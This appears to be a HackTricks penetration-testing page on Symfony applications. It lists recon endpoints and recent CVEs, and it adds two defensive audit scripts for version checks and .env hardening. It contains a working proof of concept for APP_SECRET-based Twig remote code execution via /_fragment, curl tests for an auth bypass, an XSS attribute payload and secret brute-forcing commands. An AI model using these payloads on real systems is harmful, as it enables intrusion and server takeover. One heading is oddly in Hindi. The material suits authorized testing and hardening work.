Symfony

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Symfony is one of the most widely-used PHP frameworks and regularly appears in assessments of enterprise, e-commerce and CMS targets (Drupal, Shopware, Ibexa, OroCRM … all embed Symfony components). This page collects offensive tips, common mis-configurations and recent vulnerabilities you should have on your checklist when you discover a Symfony application.

Historical note: A large part of the ecosystem still runs the 5.4 LTS branch (EOL November 2025). Symfony 7.4 became the new LTS in Nov 2025 and will receive security fixes until Nov 2029. Always verify the exact patch-level because many 2024‑2026 advisories were fixed only in micro releases.


Recon & Enumeration

Finger-printing

  • HTTP response headers: X-Powered-By: Symfony, X-Debug-Token, X-Debug-Token-Link or cookies starting with sf_redirect, sf_session, MOCKSESSID.
  • Source code leaks (composer.json, composer.lock, /vendor/…) often reveal the exact version:
curl -s https://target/vendor/composer/installed.json | jq '.[] | select(.name|test("symfony/")) | .name,.version'
  • Public routes that only exist on Symfony:
  • /_profiler (Symfony Profiler & debug toolbar)
  • /_wdt/<token> (“Web Debug Toolbar”)
  • /_error/{code}.{_format} (pretty error pages)
  • /app_dev.php, /config.php, /config_dev.php (pre-4.0 dev front-controllers)
  • Wappalyzer, BuiltWith or ffuf/feroxbuster wordlists: symfony.txt → look for /_fragment, /_profiler, .env, .htaccess.

Interesting files & endpoints

Path                                     Why it matters
/.env, /.env.local, /.env.prod           Frequently mis-deployed → leaks APP_SECRET, DB creds, SMTP, AWS keys
/.git, .svn, .hg                         Source disclosure → credentials + business logic
/var/log/*.log, /log/dev.log             Web-root mis-configuration exposes stack-traces
/_profiler                               Full request history, configuration, service container, APP_SECRET (≤ 3.4)
/_fragment                               Entry point used by ESI/HInclude. Abuse possible once you know APP_SECRET
/vendor/phpunit/phpunit/phpunit          PHPUnit RCE if accessible (CVE-2017-9841)
/index.php/_error/{code}                 Finger-print & sometimes leak exception traces

High-impact Vulnerabilities

1. APP_SECRET disclosure ➜ RCE via /_fragment (aka “secret-fragment”)

  • CVE-2019-18889 originally, but still appears on modern targets when debug is left enabled or .env is exposed.
  • Once you know the 32-char APP_SECRET, craft an HMAC token and abuse the internal render() controller to execute arbitrary Twig:
# PoC – requires the secret
import hmac, hashlib, requests, urllib.parse as u
secret = bytes.fromhex('deadbeef…')
payload = "{{['id']|filter('system')}}"   # RCE in Twig
query = {
'template': '@app/404.html.twig',
'filter': 'raw',
'_format': 'html',
'_locale': 'en',
'globals[cmd]': 'id'
}
qs = u.urlencode(query, doseq=True)
token = hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest()
r = requests.get(f"https://target/_fragment?{qs}&_token={token}")
print(r.text)
  • Excellent write-up & exploitation script: Ambionics blog (linked in References).

2. PATH_INFO auth bypass – CVE-2025-64500 (HttpFoundation)

  • Affects versions below 5.4.50, 6.4.29 and 7.3.7. Path normalization could drop the leading /, breaking access-control rules that assume /admin etc.
  • Quick test: curl -H 'PATH_INFO: admin/secret' https://target/index.php → if it reaches admin routes without auth, you found it.
  • Patch by upgrading symfony/http-foundation or the full framework to the fixed patch level.

3. MSYS2/Git-Bash argument mangling – CVE-2026-24739 (Process)

  • Affects versions below 5.4.51, 6.4.33, 7.3.11, 7.4.5 and 8.0.5 on Windows when PHP is run from MSYS2 (Git-Bash, mingw). Process fails to quote = characters, leading to corrupted paths; destructive commands (rmdir, del) may target unintended dirs.
  • If you can upload a PHP script or influence Composer/CLI helpers that call Process, craft arguments with = (e.g. E:/=tmp/delete) to cause path re-write.

4. Runtime env/argv injection – CVE-2024-50340 (Runtime)

  • When register_argv_argc=On and using non-SAPI runtimes, crafted query strings could flip APP_ENV/APP_DEBUG via argv parsing. Patched in 5.4.46/6.4.14/7.1.7.
  • Look for /?--env=prod or similar being accepted in logs.

5. URL validation / open redirect – CVE-2024-50345 (HttpFoundation)

  • Special characters in the URI were not validated the same way browsers do, enabling redirect to attacker-controlled domains. Fixed in 5.4.46/6.4.14/7.1.7.

6. Symfony UX attribute injection – CVE-2025-47946

  • symfony/ux-twig-component & symfony/ux-live-component before 2.25.1 render {{ attributes }} without escaping → attribute injection/XSS. If the app lets users define component attributes (admin CMS, email templating) you can chain to script injection.
  • Update both packages to 2.25.1+. As a manual exploit, place JS in an attribute value passed to a custom component and trigger rendering.

7. Windows Process Hijack – CVE-2024-51736 (Process)

  • The Process component searched the current working directory before PATH on Windows. An attacker able to upload tar.exe, cmd.exe, etc. in a writable web-root and trigger Process (e.g. file extraction, PDF generation) gains command execution.
  • Patched in 5.4.50, 6.4.14, 7.1.7.
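The advisories above are only useful if you can map them onto what is actually installed. The script below is an added example (not HackTricks tooling and not part of Symfony) that reads a vendor/composer/installed.json, as leaked or as found on your own server, and reports for each listed CVE whether the installed component version is at or above the fixed release quoted on this page. The sample installed.json is constructed; the FIXED_IN table holds exactly the versions quoted in items 2, 3, 4, 5 and 7. It assumes each fixed release applies to its own major.minor branch and that any branch the advisory does not name (e.g. 7.2.x) is end-of-life and never received the fix.

```python
"""Added example (not HackTricks tooling): compare Symfony component versions
from vendor/composer/installed.json against the fixed releases quoted in the
advisories on this page. The sample installed.json is constructed."""
import json
import re

# Fixed releases exactly as quoted on this page, keyed by Composer package name.
# Assumption: each release fixes its own major.minor branch; branches the
# advisory does not name are EOL and never received the fix.
FIXED_IN = {
    "symfony/http-foundation": {
        "CVE-2025-64500": ["5.4.50", "6.4.29", "7.3.7"],
        "CVE-2024-50345": ["5.4.46", "6.4.14", "7.1.7"],
    },
    "symfony/process": {
        "CVE-2024-51736": ["5.4.50", "6.4.14", "7.1.7"],
        "CVE-2026-24739": ["5.4.51", "6.4.33", "7.3.11", "7.4.5", "8.0.5"],
    },
    "symfony/runtime": {
        "CVE-2024-50340": ["5.4.46", "6.4.14", "7.1.7"],
    },
}

# Constructed sample in Composer 2 layout ({"packages": [...]}); Composer 1
# wrote a bare list, which audit() also accepts.
SAMPLE_INSTALLED_JSON = json.dumps({"packages": [
    {"name": "symfony/http-foundation", "version": "v6.4.12"},
    {"name": "symfony/process", "version": "v7.1.6"},
    {"name": "symfony/runtime", "version": "v5.4.46"},
    {"name": "twig/twig", "version": "v3.8.0"},
]})


def parse_version(text):
    """'v6.4.12' or '6.4.12' -> (6, 4, 12); pre-release suffixes are ignored."""
    m = re.match(r"v?(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"cannot parse version {text!r}")
    return tuple(int(x) for x in m.groups())


def status(installed, fixed_releases):
    """Return 'fixed' or 'vulnerable' for one installed version."""
    inst = parse_version(installed)
    fixed = [parse_version(f) for f in fixed_releases]
    same_branch = [f for f in fixed if f[:2] == inst[:2]]
    if same_branch:
        return "fixed" if inst >= same_branch[0] else "vulnerable"
    # No fix listed for this branch: anything newer than the newest fixed
    # release was cut after the fix landed (assumption); anything older sits
    # on an unpatched, end-of-life branch.
    return "fixed" if inst > max(fixed) else "vulnerable"


def audit(installed_json):
    """Map (package, CVE) -> status for every package this page has advisories for."""
    data = json.loads(installed_json)
    packages = data["packages"] if isinstance(data, dict) else data
    report = {}
    for pkg in packages:
        for cve, fixed_releases in FIXED_IN.get(pkg["name"], {}).items():
            report[(pkg["name"], cve)] = status(pkg["version"], fixed_releases)
    return report


if __name__ == "__main__":
    for (pkg, cve), verdict in sorted(audit(SAMPLE_INSTALLED_JSON).items()):
        print(f"{pkg:28} {cve:15} {verdict}")
```

Point it at a real file with `audit(open("vendor/composer/installed.json").read())`. Extend FIXED_IN from the official advisory before trusting a "fixed" verdict for a CVE this page does not quote versions for.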

8. Session-Fixation – CVE-2023-46733

  • Authentication guard reused an existing session ID after login. If an attacker sets the cookie before the victim authenticates, they hijack the account post-login.

9. Twig sandbox XSS – CVE-2023-46734

  • In applications that expose user-controlled templates (admin CMS, email builder) the nl2br filter could be abused to bypass the sandbox and inject JS.

10. Symfony 1 gadget chains (still found in legacy apps)

  • phpggc symfony/1 system id produces a Phar payload that triggers RCE when an unserialize() happens on classes such as sfNamespacedParameterHolder. Check file-upload endpoints and phar:// wrappers.

PHP - Deserialization + Autoload Classes


Exploitation Cheat-Sheet

Calculate HMAC token for /_fragment

# argv[1] = APP_SECRET as hex, argv[2] = the query string to sign
python - deadbeef… "template=@App/evil&filter=raw&_format=html" <<'PY'
import sys, hmac, hashlib, urllib.parse as u
secret = bytes.fromhex(sys.argv[1])
qs     = u.quote_plus(sys.argv[2], safe='=&')
print(hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest())
PY

Bruteforce a weak APP_SECRET

cewl -d3 https://target -w words.txt
symfony-secret-bruteforce.py -w words.txt -c abcdef1234567890 https://target

RCE via an exposed Symfony Console

If bin/console is reachable through php-fpm or directly via a CLI upload:

php bin/console about        # confirm it works
php bin/console cache:clear --no-warmup

Use deserialization gadgets inside the cache directory or write a malicious Twig template that executes on the next request.

PATH_INFO bypass को जल्दी जाँचें (CVE-2025-64500)

curl -i -H 'PATH_INFO: admin/secret' https://target/index.php
# If it returns protected content without redirect/auth, the Request normalization is vulnerable.

Spray UX attribute injection (CVE-2025-47946)

{# attacker-controlled attribute value #}
<live:button {{ attributes|merge({'onclick':'alert(1)'}) }} />

If the rendered output echoes the attribute without escaping, the XSS succeeds. Patch to 2.25.1+.


Defensive notes

  1. Never deploy debug (APP_ENV=dev, APP_DEBUG=1) to production; block /app_dev.php, /_profiler, /_wdt in the web-server config.
  2. Keep secrets in env vars or vault/secrets.local.php, never in files reachable from the document root.
  3. Keep patch management current – subscribe to Symfony security advisories and stay at least on the LTS patch level (5.4.x until Nov 2025, 6.4 until Nov 2027, 7.4 until Nov 2029).
  4. If you run on Windows, upgrade immediately to mitigate CVE-2024-51736 & CVE-2026-24739, or add open_basedir/disable_functions for defence-in-depth.
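Notes 1 and 2, together with the weak-APP_SECRET bruteforce above, boil down to a handful of settings that can be checked before a deployment goes live. The script below is an added example (not HackTricks tooling and not part of Symfony) that parses a .env-style file and flags a dev environment, debug mode, and a missing, short or word-like APP_SECRET. Both sample files are constructed; the 32-character expectation follows the "32-char APP_SECRET" remark earlier on this page, and the 3.0 bits-per-character entropy threshold is an assumption chosen to separate random hex from dictionary words.

```python
"""Added example (not HackTricks tooling): audit a Symfony .env-style file for
the production mistakes listed in the defensive notes. Samples are constructed."""
import math
from collections import Counter

WEAK_ENV = """\
# constructed example of a mis-deployed production .env
APP_ENV=dev
APP_DEBUG=1
APP_SECRET=changeme
DATABASE_URL="mysql://app:pass@127.0.0.1:3306/app"
"""

HARDENED_ENV = """\
# constructed example of the corrected settings
APP_ENV=prod
APP_DEBUG=0
APP_SECRET=7c2e9a04f1b6d385e0c7a2f49b1d6853
DATABASE_URL="mysql://app:pass@127.0.0.1:3306/app"
"""

MIN_SECRET_LEN = 32       # the page describes APP_SECRET as a 32-char value
MIN_BITS_PER_CHAR = 3.0   # assumption: below this the secret is word-like, not random
FALSE_VALUES = ("0", "false", "off", "no", "")  # boolean-false spellings


def parse_dotenv(text):
    """Minimal KEY=VALUE parser: skips blanks and comments, strips quotes."""
    env = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        env[key.strip()] = value.strip().strip('"').strip("'")
    return env


def bits_per_char(s):
    """Shannon entropy of the string's own character distribution."""
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def audit_dotenv(text):
    """Return a list of findings; an empty list means nothing was flagged."""
    env = parse_dotenv(text)
    findings = []
    if "APP_ENV" not in env:
        findings.append("APP_ENV not set: set it explicitly to prod")
    elif env["APP_ENV"] != "prod":
        findings.append(f"APP_ENV={env['APP_ENV']}: exposes /_profiler, /_wdt and error traces")
    if env.get("APP_DEBUG", "0").lower() not in FALSE_VALUES:
        findings.append(f"APP_DEBUG={env['APP_DEBUG']}: debug mode enabled in production")
    secret = env.get("APP_SECRET", "")
    if not secret:
        findings.append("APP_SECRET missing")
    else:
        if len(secret) < MIN_SECRET_LEN:
            findings.append(f"APP_SECRET is {len(secret)} chars, expected at least {MIN_SECRET_LEN}")
        if bits_per_char(secret) < MIN_BITS_PER_CHAR:
            findings.append("APP_SECRET looks word-like (low entropy): brute-forceable")
    return findings


if __name__ == "__main__":
    for label, sample in (("weak", WEAK_ENV), ("hardened", HARDENED_ENV)):
        print(label, audit_dotenv(sample) or "no findings")
```

Run it against every file Symfony loads (.env, .env.local, .env.prod) rather than only .env, since a later file silently overrides an earlier one.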

Useful offensive tooling

  • ambionics/symfony-exploits – secret-fragment RCE, discovery of debugger routes.
  • phpggc – ready-made gadget chains for Symfony 1 & 2.
  • sf-encoder_fragment – small helper to compute the HMAC (Go implementation).

References
